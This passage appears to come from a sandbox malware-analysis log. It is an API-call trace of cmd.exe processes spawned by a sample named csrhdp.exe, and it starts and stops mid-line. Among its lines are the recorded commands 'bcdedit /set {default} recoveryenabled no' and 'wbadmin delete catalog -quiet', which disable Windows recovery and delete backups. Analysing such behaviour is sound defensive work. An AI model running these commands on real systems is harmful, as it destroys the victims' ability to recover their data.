lpLCData="1") returned 2 [0099.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4acfa740, cchData=8 | out: lpLCData="/") returned 2 [0099.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4acfa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4acfa460, cchData=32 | out: lpLCData="Tue") returned 4 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4acfa420, cchData=32 | out: lpLCData="Wed") returned 4 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4acfa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4acfa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4acfa360, cchData=32 | out: lpLCData="Sat") returned 4 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4acfa700, cchData=32 | out: lpLCData="Sun") returned 4 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ace7b40, cchData=8 | out: lpLCData=".") returned 2 [0099.272] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4acfa4e0, cchData=8 | out: lpLCData=",") returned 2 [0099.272] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.273] GetProcessHeap () returned 0x3a0000 [0099.273] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x20c) returned 0x3b9680 [0099.273] GetConsoleTitleW (in: lpConsoleTitle=0x3b9680, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.273] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.273] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0099.273] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0099.273] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0099.273] GetProcessHeap () returned 0x3a0000 [0099.273] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4012) returned 0x3bcd70 [0099.273] GetProcessHeap () returned 0x3a0000 [0099.273] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bcd70 | out: hHeap=0x3a0000) returned 1 [0099.274] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0099.274] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0099.274] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0099.274] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0099.274] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0099.274] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0099.274] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0099.274] GetProcessHeap () returned 0x3a0000 [0099.274] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0) returned 0x3b98a0 [0099.274] GetProcessHeap () returned 0x3a0000 [0099.274] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x20) returned 0x3b4600 [0099.275] GetProcessHeap () returned 0x3a0000 [0099.275] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x56) returned 0x3b9960 [0099.275] GetConsoleTitleW (in: lpConsoleTitle=0x1df3c0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.276] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0099.276] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0099.276] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0099.276] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0099.276] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0099.276] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0099.276] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0099.276] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0099.276] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0099.276] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0099.276] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0099.276] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0099.276] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0099.276] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0099.276] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0099.276] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0099.276] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0099.276] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0099.276] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0099.276] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0099.276] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0099.276] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0099.276] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0099.276] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0099.276] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0099.276] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0099.276] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0099.276] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0099.276] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0099.276] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0099.276] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0099.276] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0099.276] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0099.276] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0099.276] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0099.276] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0099.276] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0099.276] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0099.276] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0099.277] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0099.277] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0099.277] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0099.277] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0099.277] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0099.277] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0099.277] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0099.277] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0099.277] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0099.277] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0099.277] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0099.277] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0099.277] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0099.277] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0099.277] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0099.277] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0099.277] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0099.277] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0099.277] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0099.277] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0099.277] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0099.277] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0099.277] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0099.277] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0099.277] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0099.277] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0099.277] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0099.277] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0099.277] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0099.277] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0099.277] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0099.277] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0099.277] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0099.277] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0099.277] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0099.277] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0099.277] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0099.277] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0099.277] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0099.277] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0099.277] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0099.278] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0099.278] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0099.278] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0099.278] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0099.278] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0099.278] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0099.278] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0099.278] GetProcessHeap () returned 0x3a0000 [0099.278] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x218) returned 0x3b99c0 [0099.278] GetProcessHeap () returned 0x3a0000 [0099.278] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x66) returned 0x3b9be0 [0099.278] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0099.278] GetProcessHeap () returned 0x3a0000 [0099.278] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x420) returned 0x3a1320 [0099.278] SetErrorMode (uMode=0x0) returned 0x0 [0099.278] SetErrorMode (uMode=0x1) returned 0x0 [0099.278] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1330, lpFilePart=0x1dec50 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1dec50*="Desktop") returned 0x25 [0099.279] SetErrorMode (uMode=0x0) returned 0x1 [0099.279] GetProcessHeap () returned 0x3a0000 [0099.279] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3a1320, Size=0x6c) returned 0x3a1320 [0099.279] GetProcessHeap () returned 0x3a0000 [0099.279] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3a1320) returned 0x6c [0099.279] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.279] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.279] GetProcessHeap () returned 0x3a0000 [0099.279] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x128) returned 0x3b9c50 [0099.279] GetProcessHeap () returned 0x3a0000 [0099.279] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x240) returned 0x3b9d80 [0099.285] GetProcessHeap () returned 0x3a0000 [0099.285] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b9d80, Size=0x12a) returned 0x3b9d80 [0099.285] GetProcessHeap () returned 0x3a0000 [0099.285] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b9d80) returned 0x12a [0099.285] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.285] GetProcessHeap () returned 0x3a0000 [0099.285] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xe8) returned 0x3b9ec0 [0099.285] GetProcessHeap () returned 0x3a0000 [0099.285] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b9ec0, Size=0x7e) returned 0x3b9ec0 [0099.285] GetProcessHeap () returned 0x3a0000 [0099.285] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b9ec0) returned 0x7e [0099.286] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.286] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1de9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1de9c0) returned 0xffffffffffffffff [0099.286] GetLastError () returned 0x2 [0099.286] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1de9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1de9c0) returned 0xffffffffffffffff [0099.286] GetLastError () returned 0x2 [0099.287] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.287] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1de9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1de9c0) returned 0x3b9f50 [0099.319] GetProcessHeap () returned 0x3a0000 [0099.319] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x28) returned 0x3b4630 [0099.322] FindClose (in: hFindFile=0x3b9f50 | out: hFindFile=0x3b9f50) returned 1 [0099.322] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x1de9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1de9c0) returned 0xffffffffffffffff [0099.322] GetLastError () returned 0x2 [0099.322] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x1de9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1de9c0) returned 0x3b9f50 [0099.322] GetProcessHeap () returned 0x3a0000 [0099.322] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4630, Size=0x8) returned 0x3b9fb0 [0099.322] FindClose (in: hFindFile=0x3b9f50 | out: hFindFile=0x3b9f50) returned 1 [0099.323] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.323] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.323] GetConsoleTitleW (in: lpConsoleTitle=0x1def10, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.323] InitializeProcThreadAttributeList (in: lpAttributeList=0x1decc8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1dec88 | out: lpAttributeList=0x1decc8, lpSize=0x1dec88) returned 1 [0099.323] UpdateProcThreadAttribute (in: lpAttributeList=0x1decc8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1dec78, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1decc8, lpPreviousValue=0x0) returned 1 [0099.323] GetStartupInfoW (in: lpStartupInfo=0x1dede0 | out: lpStartupInfo=0x1dede0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0099.323] GetProcessHeap () returned 0x3a0000 [0099.323] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x20) returned 0x3b4630 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.323] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.324] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.324] GetProcessHeap () returned 0x3a0000 [0099.324] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4630 | out: hHeap=0x3a0000) returned 1 [0099.324] GetProcessHeap () returned 0x3a0000 [0099.324] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x12) returned 0x3b8370 [0099.324] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0099.325] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ded00*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1decb0 | out: lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessInformation=0x1decb0*(hProcess=0x54, hThread=0x50, dwProcessId=0x8c8, dwThreadId=0x8c0)) returned 1 [0099.776] CloseHandle (hObject=0x50) returned 1 [0099.776] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.776] GetProcessHeap () returned 0x3a0000 [0099.776] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bc280 | out: hHeap=0x3a0000) returned 1 [0099.776] GetEnvironmentStringsW () returned 0x3bac80* [0099.776] GetProcessHeap () returned 0x3a0000 [0099.776] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xae8) returned 0x3bb770 [0099.776] FreeEnvironmentStringsW (penv=0x3bac80) returned 1 [0099.776] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0100.546] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1debf8 | out: lpExitCode=0x1debf8*=0x0) returned 1 [0100.546] CloseHandle (hObject=0x54) returned 1 [0100.546] _vsnwprintf (in: _Buffer=0x1dee68, _BufferCount=0x13, _Format="%08X", _ArgList=0x1dec08 | out: _Buffer="00000000") returned 8 [0100.547] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.547] GetProcessHeap () returned 0x3a0000 [0100.547] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb770 | out: hHeap=0x3a0000) returned 1 [0100.547] GetEnvironmentStringsW () returned 0x3bac80* [0100.547] GetProcessHeap () returned 0x3a0000 [0100.547] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0e) returned 0x3bcd80 [0100.547] FreeEnvironmentStringsW (penv=0x3bac80) returned 1 [0100.547] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.547] GetProcessHeap () returned 0x3a0000 [0100.547] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bcd80 | out: hHeap=0x3a0000) returned 1 [0100.547] GetEnvironmentStringsW () returned 0x3bac80* [0100.547] GetProcessHeap () returned 0x3a0000 [0100.547] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb0e) returned 0x3bcd80 [0100.547] FreeEnvironmentStringsW (penv=0x3bac80) returned 1 [0100.547] GetProcessHeap () returned 0x3a0000 [0100.547] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b8370 | out: hHeap=0x3a0000) returned 1 [0100.547] DeleteProcThreadAttributeList (in: lpAttributeList=0x1decc8 | out: lpAttributeList=0x1decc8) [0100.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0100.547] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0100.548] SetConsoleInputExeNameW () returned 0x1 [0100.548] GetConsoleOutputCP () returned 0x1b5 [0100.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0100.548] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.548] exit (_Code=0) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x267d1000" os_pid = "0x4f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9b8" cmd_line = "/C wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0x6a8 [0099.179] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fcc0 | out: lpSystemTimeAsFileTime=0x14fcc0*(dwLowDateTime=0x8f204e90, dwHighDateTime=0x1d5956e)) [0099.179] GetCurrentProcessId () returned 0x4f0 [0099.179] GetCurrentThreadId () returned 0x6a8 [0099.179] GetTickCount () returned 0x1152eaf [0099.179] QueryPerformanceCounter (in: lpPerformanceCount=0x14fcc8 | out: lpPerformanceCount=0x14fcc8*=21946412516) returned 1 [0099.181] GetModuleHandleW (lpModuleName=0x0) returned 0x4acb0000 [0099.181] __set_app_type (_Type=0x1) [0099.181] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4acd7810) returned 0x0 [0099.181] __getmainargs (in: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610, _DoWildCard=0, _StartInfo=0x4acde0f4 | out: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610) returned 0 [0099.181] GetCurrentThreadId () returned 0x6a8 [0099.181] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6a8) returned 0x3c [0099.181] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.181] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0099.181] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.181] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.181] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc58 | out: phkResult=0x14fc58*=0x0) returned 0x2 [0099.182] VirtualQuery (in: lpAddress=0x14fc40, lpBuffer=0x14fbc0, dwLength=0x30 | out: lpBuffer=0x14fbc0*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.182] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fbc0, dwLength=0x30 | out: lpBuffer=0x14fbc0*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.182] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fbc0, dwLength=0x30 | out: 